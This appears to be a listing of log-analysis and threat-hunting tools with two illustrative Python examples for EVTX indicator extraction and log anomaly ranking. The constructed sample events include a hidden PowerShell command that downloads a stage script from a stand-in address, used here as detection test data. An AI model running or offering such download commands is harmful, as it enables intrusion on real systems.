log-analytics
Windows EVTX log analysis for DFIR — fast parsing, ATT&CK mapping, IOC extraction, and Sentinel anomaly detection. Normal + Juggernaut Mode (Arrow/DuckDB) for 10M+ events.
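The two analysis steps named above, IOC extraction and ATT&CK mapping, shown on a handful of constructed Security-log records rendered as EVTX XML. This is an added example, not the tool's own code: the sample events, the regexes and the event-ID-to-technique rules are all assumptions for illustration (the mapping is a deliberately small heuristic, not an official ATT&CK crosswalk), and loopback addresses are dropped so that a local logon does not show up as an indicator.

```python
import re
import ipaddress
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample records (not real logs) in the XML layout EVTX parsers render.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4688</EventID><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="NewProcessName">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell -nop -w hidden -c "iwr http://203.0.113.7/stage.ps1"</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="TargetUserName">svc_backup</Data>
    <Data Name="LogonType">10</Data>
    <Data Name="IpAddress">198.51.100.23</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="TargetUserName">jdoe</Data>
    <Data Name="LogonType">2</Data>
    <Data Name="IpAddress">127.0.0.1</Data>
  </EventData>
</Event>
</Events>"""

IOC_PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "url": re.compile(r"https?://[^\s\"'<>]+"),
    "sha256": re.compile(r"\b[0-9a-fA-F]{64}\b"),
}


def map_attack(rec):
    """Illustrative event-to-technique rules (an assumption for this example,
    not an official mapping): PowerShell process creation, RDP and network logons."""
    eid = rec.get("EventID")
    if eid == 4688 and "powershell" in rec.get("NewProcessName", "").lower():
        return "T1059.001"  # Command and Scripting Interpreter: PowerShell
    if eid == 4624 and rec.get("LogonType") == "10":
        return "T1021.001"  # Remote Services: Remote Desktop Protocol
    if eid == 4624 and rec.get("LogonType") == "3":
        return "T1021"      # Remote Services (network logon)
    return None


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # strip the XML namespace prefix


def parse_events(xml_text):
    """Flatten each <Event> into a dict of System fields plus EventData/Data[@Name]."""
    for ev in ET.fromstring(xml_text):
        rec = {}
        for el in ev.iter():
            name = _local(el.tag)
            if name == "EventID":
                rec["EventID"] = int(el.text)
            elif name == "Computer":
                rec["Computer"] = el.text
            elif name == "Data" and el.get("Name"):
                rec[el.get("Name")] = el.text or ""
        yield rec


def extract_iocs(rec):
    """Run every IOC regex over every string field; skip loopback and malformed IPs."""
    found = defaultdict(set)
    for value in rec.values():
        if not isinstance(value, str):
            continue
        for kind, pat in IOC_PATTERNS.items():
            for hit in pat.findall(value):
                if kind == "ipv4":
                    try:
                        if ipaddress.ip_address(hit).is_loopback:
                            continue
                    except ValueError:
                        continue  # regex matched an out-of-range octet
                found[kind].add(hit)
    return {k: sorted(v) for k, v in found.items()}


def analyze(xml_text):
    """One row per event: technique guess plus deduplicated, sorted IOCs."""
    return [{"EventID": r["EventID"], "Computer": r.get("Computer"),
             "technique": map_attack(r), "iocs": extract_iocs(r)}
            for r in parse_events(xml_text)]


if __name__ == "__main__":
    for row in analyze(SAMPLE_XML):
        print(row)
```

The local 4624 (LogonType 2 from 127.0.0.1) yields neither a technique nor an IOC, which is the behaviour you want before a noisy event stream is fed into a ticketing system; the RDP logon and the PowerShell download both surface with their remote addresses.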
Agentic Alert Investigation for Production Pipelines.
Automated root cause analysis before your team gets paged. Build your own AI SRE agents. The open-source toolkit for the AI era ✨
The open-source framework for AI SRE agents, and the training and evaluation environment they need to improve. Connect the 60+ tools you already run, define your own workflows, and investigate incidents on your own infrastructure.
Turn SOC Noise into Real Signals. Autonomous SOC Platform.
Qevlar AI investigates every alert like your top analyst would. So your SOC focuses on real threats, not alert firefighting.
Grab your DNS logs, detect anomalies, and finally understand what's happening on your network. The missing piece between DNS servers and your data stack.
DNS-collector is a lightweight tool that captures DNS queries and responses from your DNS servers, processes them intelligently, and sends clean data to your monitoring or analytics systems.
Analyze huge log files (10GB+) instantly in your browser. Zero upload, 100% local processing. Features JSON prettifier, regex filtering, and bookmarks.
The missing tool for DevOps and Backend Developers. Analyze gigabyte-sized log files instantly in your browser without crashing your device.
Reduce logs to their semantic anomalies.
Cordon uses transformer embeddings and density scoring to identify semantically unusual patterns in large log files, reducing massive logs to the most anomalous sections for analysis. Repetitive patterns (even errors) are considered "normal background." Cordon surfaces unusual, rare, or clustered events that stand out semantically from the bulk of the logs.
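The density idea described above on a constructed log, as an added example rather than Cordon's code. Two substitutions are assumptions made to keep it dependency-free: lines are embedded as bag-of-token counts (numbers collapsed to one placeholder) instead of transformer embeddings, and the density score is the mean cosine similarity to each line's k nearest neighbours. The effect the description promises still holds: the repeated ERROR lines score as background, the two one-off lines score lowest.

```python
import math
import re
from collections import Counter

# Constructed sample log (not real data). Repeated lines, errors included, are
# background; the WARN and CRITICAL lines occur once and should rank as anomalous.
SAMPLE_LOG = """\
INFO  healthcheck ok service=api latency=12ms
INFO  healthcheck ok service=api latency=14ms
ERROR connection timeout to db-1 retrying
INFO  healthcheck ok service=api latency=11ms
ERROR connection timeout to db-1 retrying
INFO  healthcheck ok service=api latency=13ms
WARN  new authorized_key added for root from 198.51.100.9
ERROR connection timeout to db-1 retrying
INFO  healthcheck ok service=api latency=12ms
INFO  healthcheck ok service=api latency=15ms
ERROR connection timeout to db-1 retrying
INFO  healthcheck ok service=api latency=10ms
CRITICAL unsigned kernel module loaded name=netfilter_helper.ko
INFO  healthcheck ok service=api latency=12ms
"""

TOKEN_RE = re.compile(r"[a-zA-Z_]+|\d+")


def tokenize(line):
    """Lower-case word tokens; every run of digits becomes one placeholder so
    'latency=12ms' and 'latency=14ms' embed identically."""
    return ["<num>" if t.isdigit() else t for t in TOKEN_RE.findall(line.lower())]


def embed(line):
    # Stand-in for a transformer embedding: a sparse bag-of-tokens vector.
    return Counter(tokenize(line))


def cosine(a, b):
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0


def density_scores(lines, k=3):
    """Density of each line = mean similarity to its k most similar other lines.
    High density means 'many near-duplicates', i.e. background; low means rare."""
    vecs = [embed(line) for line in lines]
    scores = []
    for i, v in enumerate(vecs):
        sims = sorted((cosine(v, w) for j, w in enumerate(vecs) if j != i), reverse=True)
        scores.append(sum(sims[:k]) / k)
    return scores


def most_anomalous(log_text, n=2, k=3):
    """Return the n lines with the lowest density, most anomalous first."""
    lines = [line for line in log_text.splitlines() if line.strip()]
    ranked = sorted(zip(density_scores(lines, k), lines))
    return [line for _, line in ranked[:n]]


if __name__ == "__main__":
    for line in most_anomalous(SAMPLE_LOG):
        print(line)
```

The choice of k matters: with k larger than the count of a repeated pattern, that pattern's density drops and it starts to look anomalous, so tune k against the volume of the noisiest expected background rather than leaving it at a default.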
CISA’s LME provides a free, easy-to-deploy log management solution. It includes real-time threat alerts, customizable dashboards, and community collaboration on GitHub, helping small to medium-sized organizations improve their cybersecurity.
CISA's Logging Made Easy (LME) is a no cost, open source platform that centralizes log collection, enhances threat detection, and enables real-time alerting, helping small to medium-sized organizations secure their infrastructure. Whether you're upgrading from a previous version or deploying for the first time, LME offers a scalable, efficient solution for logging and endpoint security.
A real-time dashboard for analyzing Traefik logs with IP geolocation, status code analysis, and service metrics. Built with React (Shadcn UI) and Node.js.
Purpose-built log analytics UI for ClickHouse.
A modern, single-binary, high-performance log analytics platform.
Logchef is a dedicated log query and visualization interface built specifically for ClickHouse. It fills a critical gap in the ClickHouse ecosystem, providing a powerful log explorer without reinventing log collection or storage.
Threat-hunting tool for Linux. Bring your Linux threat-hunting capabilities to the next level.
Kunai is a powerful tool designed to bring actionable insights for tasks such as security monitoring and threat hunting on Linux systems. Think of it as the Linux counterpart to Sysmon on Windows, tailored for comprehensive and precise event monitoring.